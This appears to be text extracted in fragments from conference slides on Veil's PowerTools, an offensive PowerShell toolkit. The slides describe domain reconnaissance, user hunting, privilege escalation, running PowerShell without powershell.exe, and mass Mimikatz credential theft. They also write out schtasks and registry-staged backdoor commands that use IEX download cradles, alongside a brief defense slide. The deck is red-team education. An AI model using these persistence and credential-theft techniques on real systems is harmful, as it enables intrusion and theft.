Drilling Deeper with Veil's PowerTools Justin Warner, Will Schroeder Veris Group's Adaptive Threat Division

Drilling deeper with Veil's PowerTools

Drilling Deeper


Veil’s PowerToolsJustin Warner, Will Schroeder

Veris Group’s Adaptive Threat Division

◎Pentester and red teamer for the

Adaptive Threat Division of Veris Group

◎Lots of interest: red team ops, reverse

engineering, adversarial tactics, etc

◎Developer on the Veil-Framework and

co-founder of Veil’s PowerTools

◎Security researcher and red teamer for

the Adaptive Threat Division of Veris


◎Co-founder of the Veil-Framework and

founder of Veil’s PowerTools

◎Cons: Shmoocon, CarolinaCon, Defcon,

Derbycon, various BSides

◎ Introduction






◎Dear M$



How We Got Here

The Veil-Framework

◎An offensive toolkit aimed at bridging the

gap between pentesting and red teaming


◎Started with the release of Veil-Evasion○ expanded with Catapult, Pillage, and


◎CarolinaCon 2014 - “The Veil-


Veil’s PowerTools

◎All of our offensive PowerShell work

from the Veil-Framework (and other

projects) was pulled into the new

PowerTools repo

◎PowerTools will remain the primary

source for all PowerShell work, with the

Veil repo containing offensive Python


Why PowerShell

○ PowerShell provides (out of the box):□ Full .NET access

□ application whitelisting

□ direct access to the Win32 API

□ ability to execute purely in memory

□ default installation Win7+ !

○ “Why I Choose PowerShell as an Attack

Platform”□ http://www.exploit-monday.com/2012/08/Why-I-


“Bad Guys”

“Microsoft’s Post-Exploitation




Domain Situational


◎Think dsquery on steroids... and cocaine

◎First started because a client banned

“net” commands on domain machines

◎Otherwise initially inspired by Rob

Fuller’s netview.exe tool○ Wanted something more flexible that also didn’t

drop a binary to disk


User Hunting

◎Goal: find which domain machines

specific users are logged into

◎ Invoke-UserHunter: finds where target

users or group members are logged into

on the network

◎ Invoke-StealthUserHunter: extracts

user homeDirectories from AD, gets

sessions on all these file servers to hunt

for targets

○ Significantly less traffic than Invoke-UserHunter

Offensive Event Parsing

◎Once you get DA, domain controller

event logs make it trivial to track down

user locations

◎PowerView’s Get-UserLogonEvents

lets you easily extract account logon

events (4624) from a host

◎ Invoke-UserEventHunter wraps this all

up into a weaponized form

Domain Trusts

◎PowerView can now enumerate and

exploit existing domain trusts:○ Get-NetDomainTrusts, Get-NetForestDomains

◎Most PowerView functions now accept a

“-Domain <name>” flag, allowing them to

operate across trusts○ e.g. Get-NetUsers –Domain sub.test.local

◎ Invoke-MapDomainTrusts can

recursively map all reachable trusts from

a foothold

Data Mining

◎PowerView’s Invoke-ShareFinder -

CheckAccess can find all shares

readable by the current user

◎ Invoke-FileFinder can search a network

for open file shares, or take a share list

from Invoke-ShareFinder

◎Spits out a .csv of found files, sortable by

creation or last access times

Automating Windows


◎On past assessments, had to escalate

privileges on a locked down workstation

◎Kernel exploits wouldn’t work, so fell

back to vulnerable service binaries

◎More or less did everything manually,

wanted something a bit easier○ Started implementing the “Encyclopedia of


Windows Services

◎One of the most effective escalation

vectors was (and still is) vulnerable

Windows services○ Sometimes can modify a service itself

○ Get-ServicePerms will check for these

◎However, many organizations overlook

the permissions for service binaries :)○ Use Get-ServiceEXEPerms, then overwrite the

service binary to add a local user or install an


.DLL Hijacking

◎Many programs/services will search in

multiple locations when loading,

including directories listed in the PATH

environment variable

◎ If you have write access to any folder in

PATH, there’s a good chance you can

drop a malicious DLL and escalate

privileges○ Invoke-FindPathHijack will search for these


◎Automates everything we’ve talked

about, and more

◎ Invoke-AllChecks will run all current

checks against a host

◎Functions exist to abuse most of the

escalation vectors found

Lock Picking the


◎ Incident responders are recognizing and

targeting PowerShell.exe

○ Had a client write HIPS rules against

psh_psexec, YA, for reals

◎We wanted to be prepared for more

situations like this

◎Developed PowerPick as a combination of

solutions to run PowerShell without


Bypassing the Blacklist

◎ Used assemblies in .NET/C# to execute code

○ System.Management.Automation

◎ Developed SharpPick

○ http://www.sixdub.net/2014/12/02/inexorable-



◎ To defeat with blacklist policy (not ideal), must

permission off or block DLLs in the Global

Assembly Cache (GAC)

○ C:\Windows\Assembly\*

Runspaces in Unmanaged Code

◎SharpPick wasn’t very sexy

○ Binary on disk = Lame!

◎Lee Christensen (@tifkin_) authored

“UnmanagedPowerShell” to utilize .NET

assemblies from C

○ Uses CLR and custom .NET assembly in memory

○ https://github.com/leechristensen/UnmanagedPo


◎Transformed this code into a reflective

DLL = ReflectivePick

PowerShell Inception = Injection!!

◎Decided it needed more PowerShell

◎Embedded ReflectivePick into Invoke-

ReflectivePEInjection from Powersploit

by @josephbialek

○ Created Invoke-PSInjector

◎ Injects DLL into remote process that

runs PowerShell code

ReflectivePick Diagram



.NET AssemblyDownload Cradle

PewPewPewLaunching Lazerz at

your Targets

◎Model to run PowerShell scripts on a

mass number of machines and retrieve


1. A jobbified webserver is kicked off in the

background which serves out a specified

PowerShell file

2. A IEX() one-liner is executed on machines

through WMI to download/executed the

hosted code

3. Results are POSTed back to the local


◎Executes PowerSploit’s Invoke-

Mimikatz on multiple machines without


◎Raw Mimikatz results are saved on the

pivot host

◎Result files are parsed and

Server:Credential objects are output to

the pipeline

◎Microsoft has another gift for attackers,

the Windows Search Indexing Service○ Why search through all of a system’s file when

Windows does this for you?

◎ Invoke-MassSearch performs the same

pattern as Invoke-MassMimikatz○ allows you to query the search indexer across

machines where you have admin access

New Release

◎One obvious gap remaining in workflow

of Veil PowerTools

◎Motivation: offense in depth theory

◎Wanted multiple easy ways to remain

resident on the compromised systems○ Memory only

◎Yes… More PowerShell○ Why not utilize our favorite scripting language?!

◎Goal: automate a bunch of

techniques/tools to backdoor a system

◎Multiple triggers, various host/network

signatures○ We will show some of the “cool” ones

◎Based on Shmoocon 2013 “Wipe The

Drive” by Jake Williams


◎Uses Get-WinEvent to monitor windows

event logs for failed RDP attempts

◎When it recognizes “trigger” username,

phones home to attacker○ With an IEX(...) download cradle

◎Based upon Get-Packet by Robbie

Foust http://blog.robbiefoust.com/?p=68○ Uses system.net.sockets.socket to create raw


○ Uses socket.iocontrol to make promiscuous

◎Promiscuously sniffs traffic on system

and inspects data for “magic” trigger

value ○ UDP, TCP, ICMP

◎Common action of attackers is to add

domain/local users

◎Uses ADSI to monitor for a users


◎ If the user is not found, assumes the

worst and phones home

◎Attempts to be a little stealthier and

usable on external assessments

◎Resolves specified DNS name on

interval and if the resolution doesn’t

equal a predefined IP...


Persistence… If you must

◎Focuses more on non-persistent


◎Schedule tasks seem to work really well

for PowerShell in domain networks

schtasks /create /tn OfficeUpdater /tr

"powershell.exe -w hidden -NonI -nop -c 'IEX



pt.ps1'''))'" /sc onlogon /ru System

Registry Storage

◎Better yet, stage your script in the registry!

$backdoor = "write-host 123”

Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name

'secret' -Value $backdoor

schtasks /create /tn Updater /tr "powershell -c 'IEX (gp

HKLM:HARDWARE\ secret).secret'" /sc onlogon /ru


So what?

◎Nothing revolutionary here!

◎Nothing worse than owning a system

and not being able to get back on later!

◎Real power comes when combining

PowerTools○ PewPewPew with PowerBreach

2 Cents

Almost ready for the show!

Obligatory Defense Slide

◎HIPs and Whitelisting generally help

endpoint defense

◎Enterprise incident response capabilities○ Memory only capabilities but scripts (“malware”)

able to be easily recovered and analyzed

◎Need a clear way to restrict PowerShell

& .NET assemblies to certain users

True Story…

◎Justin○ @sixsub

○ http://www.sixdub.net/

○ justin [at] sixdub.net

◎Will○ @harmj0y

○ http://blog.harmj0y.net/

○ will [at] harmj0y.net
